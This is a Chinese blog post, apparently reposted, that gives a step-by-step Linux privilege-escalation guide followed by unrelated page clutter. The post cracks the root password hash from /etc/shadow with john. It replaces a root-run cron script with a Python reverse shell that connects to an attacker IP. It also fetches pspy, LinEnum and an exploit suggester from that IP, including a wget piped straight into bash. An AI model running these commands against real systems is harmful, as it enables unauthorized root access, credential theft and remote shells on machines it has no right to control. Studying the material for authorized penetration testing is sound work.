Linux提权技巧总结

最新推荐文章于 2024-06-07 19:04:22 发布
最新推荐文章于 2024-06-07 19:04:22 发布
阅读量391 收藏 6
点赞数 4
文章标签: 计算机网络 web安全 安全 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79527080/article/details/139005194
版权

john爆破root密文

cat /etc/shadow

root:$6$URZ1c7qW$z5jZA6/j9fb8d4ExJOWuwCjEFo0tfBkfV.D3OIf0c0ukepcZYgrBhO6vjpNbmYct1uco9NrtBw3z50tCoMbqb1:18907:0:99999:7:::

    1.

gzip -d /usr/share/wordlists/rockyou.txt.gz

john --wordlist="/usr/share/wordlists/rockyou.txt" userpasswd

    1.
    2.
    3.

计划任务提权(cron Jobs)

    定时任务(cron job)被用于安排那些需要被周期性执行的命令。利用它,你可以配置某些命令或者脚本,让它们在某个设定的时间内周期性地运行。cron 是 Linux 或者类 Unix 系统中最为实用的工具之一。cron 服务(守护进程)在系统后台运行,并且会持续地检查 /etc/crontab 文件和 /etc/cron.*/ 目录。它同样也会检查 /var/spool/cron/ 目录。

提权的前提是存在一个执行危险脚本的任务计划,并且这个任务计划执行的执行脚本可以被非root权限用户修改覆盖,并可以正常执行任务计划

信息收集

列出计划任务:

#/var/spool/cron/ 这个目录下存放的是每个用户包括root的crontab任务
/var/spool/cron/crontabs/root 这个目录是root任务文件,没有root权限无法查看
ls -alh /var/spool/cron    
ls -al /etc/cron*
#查看当前登陆用户的计划任务
crontab -l

cat /etc/crontab
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

    1.
    2.
    3.
    4.
    5.
    6.
    7.
    8.
    9.
    10.
    11.
    12.
    13.
    14.
    15.

    tail -f /var/log/syslog

    (root) CMD (bash -c "/script/cleanup.py")

查看日志文件 发现root每一分钟会执行一次 cleanup.py文件

修改内容 反弹shell

#!/usr/bin/env python3
import socket,subprocess,os
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(( "192.168.10.128" , 6666 ))
os.dup2(s.fileno(), 0 )
os.dup2(s.fileno(), 1 )
os.dup2(s.fileno(), 2 )
p = subprocess.call([ "/bin/bash" , "-i" ])

    1.
    2.
    3.
    4.
    5.
    6.
    7.
    8.

pspy工具

wget 192.168.10.128/pspy64s
chmod  777 pspy64s
./pspy64s

    1.
    2.
    3.

可以看到这里,每分钟都会执行一次cleanup.py这个文件

发现计划任务,我们可以去检测该文件是否存在一些可能导致权限提升的问题。
提权脚本
LinEnum

https://github.com/rebootuser/LinEnum
wget -O - http://192.168.10.128/LinEnum.sh | bash

wget http://192.168.10.128/LinEnum.sh
chmod 777 LinEnum.sh
./LinEnum.sh > info.txt
cat info.txt|grep docker

    1.
    2.
    3.
    4.
    5.
    6.
    7.

linux-exploit-suggester2

wget http://192.168.10.128/linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl -k 3.0

    1.
    2.
    3.

linux
-----------------------------------
©著作权归作者所有:来自51CTO博客作者Chelth的原创作品,请联系作者获取转载授权,否则将追究法律责任
Linux提权技巧总结(九)
https://blog.51cto.com/u_14881360/10820180

等保成长之路
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux技巧Linux技巧
qq2453939845的博客
04-26 109
关于Linux技巧是不是有很多的小伙伴们不了解呢? 今天小编在文中将为大家介绍一个Linux用的技巧,感兴趣的小伙伴们一起跟小编去学习具体方法吧。 OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本 一个test: 以下是引用片段: [xiaoyu@localdomain ~]$ ech...
升-linux手法总结
01-14
升-linux手法总结
Linux手法总结以及 Linuxexp集合
02-22
Linux常见总结包括(内核漏洞、suid、定时任务、sudo等等)
浅析Linux系统常规手段的原理与技巧
道阻且长,行则将至。
01-08 1100
渗透测试过程中,通过 Web 服务漏洞(比如文件上传漏洞)拿到服务器 Shell 后,经常会发现所获得的 Shell 仅有较低的限,而为了进一步获得高限 Shell(root),避免不了地就是进一步进行。本文来学习、总结Linux 系统一些常规的手段的原理与技巧
详细|Linux总结
st3pby的博客
11-06 6625
Linux总结
linux秘籍
失心少年
09-27 772
uname -a/etc/阴影文件包含用户密码哈希,默认情况下,除root用户外,任何用户都无法读取。如果我们能够读取/etc/shadow文件的内容,我们可能能够破解根用户的密码哈希。如果我们能够修改/etc/shadow文件,我们就可以用一个我们知道的密码散列替换根用户的密码哈希。该文件历来包含的用户密码散列。为了向后兼容,如果/etc/passwd中的用户行的第二个字段包含密码哈希,那么它优先/etc/shadow中的哈希。
linux 方法总结
whatday的专栏
01-10 2848
几点前 已经拿到低shell 被入侵的机器上面有nc,python,perl等linux非常常见的工具 有限上传文件和下载文件 内核漏洞 到脏牛,运维流下两行眼泪,我们留下两行鼻血。内核漏洞是我们几乎最先想到的方法。通杀的内核漏洞是十分少见的,因而我们应该先对系统相关的信息进行收集。 查看发行版 cat /etc/issue cat /etc/*-release 查看内核版本 uname -a 这里我找了台机器测试: #uname -a Linux xxxxx
linux总结
记录学习,一起进步
07-16 592
linux总结
Linux基础
2301_77004573的博客
11-08 147
( backup.sh 脚本有定义完整的路径),cron 将引用 /etc/crontab 文件中的 PATH 变量下列出的路径;在这种情况下,我们可以尝试在用户的主文件夹(home)下创建一个名为“antivirus.sh”的脚本,然后让它作为 cron 任务运行。最终传入的反向 shell 连接能够帮助我们成功获取 root 限。一旦你发现现有的脚本或任务被附加到cron jobs,那么就值得花时间去了解相关脚本的功能以及如何在上下文中使用工具对cron jobs进行利用。
linux用的一个技巧
09-16
一个linux用的技巧,放出来全当找工作攒RP了。 OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本
Linux扫描脚本
04-28
Linux扫描脚本
windows&linux;总结
04-24
windows&linux;总结,套路,套路,套路,套路套路,套路,套路,。
ATT&CK升-Linux总结
u013797594的博客
06-12 1626
ATT&CK升-Linux总结
Linux渗透与技巧总结
Coisini的博客
06-23 2524
本文为Linux渗透与技巧总结篇,旨在收集各种Linux渗透技巧版本,方便各位同学在日后的渗透测试中能够事半功倍。 Linux 系统下的一些常见路径: /etc/passwd /etc/shadow /etc/fstab /etc/host.conf /etc/motd /etc/ld.so.conf /var/www/htdocs/index.php /var/www/c...
【网络安全的神秘世界】docker搭建pikachu靶场
weixin_54750312的博客
05-31 550
再访问80端口,因为默认端口就是80,所以80可省略。可以通过下面命令进入pikachu网站根目录。虽然是404,但实际已经启动好了。点击红色部分,进行安装/初始化。复制命令后,去kali安装。访问本地地址8080端口。
基于拓扑漏洞分析的网络安全态势感知模型
最新发布
attack2001的专栏
06-07 572
漏洞态势分析是指通过获取网络系统中的漏洞信息、拓扑信息、攻击信息等,分析网络资产可能遭受的安全威胁以及预测攻击者利用漏洞可能发动的攻击,构建拓扑漏洞图,展示网络中可能存在的薄弱环节,以此来评估网络安全状态。在网络安全形势日益恶化的今天,如何快速有效地获取网络系统的安全状况、高网络安全应对水平、增大网络安全的预警时间,成为网络空间安全领域研究的重要问题。网络漏洞态势感知研究存在的问题是缺乏有效的网络漏洞势数据采集和要素取方法,使得网络资产漏洞态势的理解和分析计算难以进行。
自学黑客(网络安全)
xv7676的博客
06-07 590
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全(补充)
m0_62207482的博客
06-07 310
拒绝服务攻击原理简单,实施容易,但是却难以防范,特别是与Botnet网络结合后,其攻击能力大大高 SYN Cookie是对TCP服务器端的三次握手协议做一些修改,专门用来防范SYN Flood攻击的一种手段 不是任何利用脚本插入实现攻击的漏洞都被称为XSS,因为还有另一种攻击方式:Injection(脚本注入)。。跨站脚本攻击和脚本注入攻击的区别在于脚本注入攻击会把插入的脚本保存在被修改的远程Web页面里,跨站脚本是临时的,执行后就消失了 时间轮询技术(也可称为“外挂轮询技术”)。时间轮询技术是
msf linux
09-12
Linux中,Metasploit Framework(MSF)是一个...总结来说,我的目的是确保信息安全和合规性,所以我不能在这里供关于的具体指导。如果你有合法的需求,请参考相关的文档、教程和专业训练来学习和掌握技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值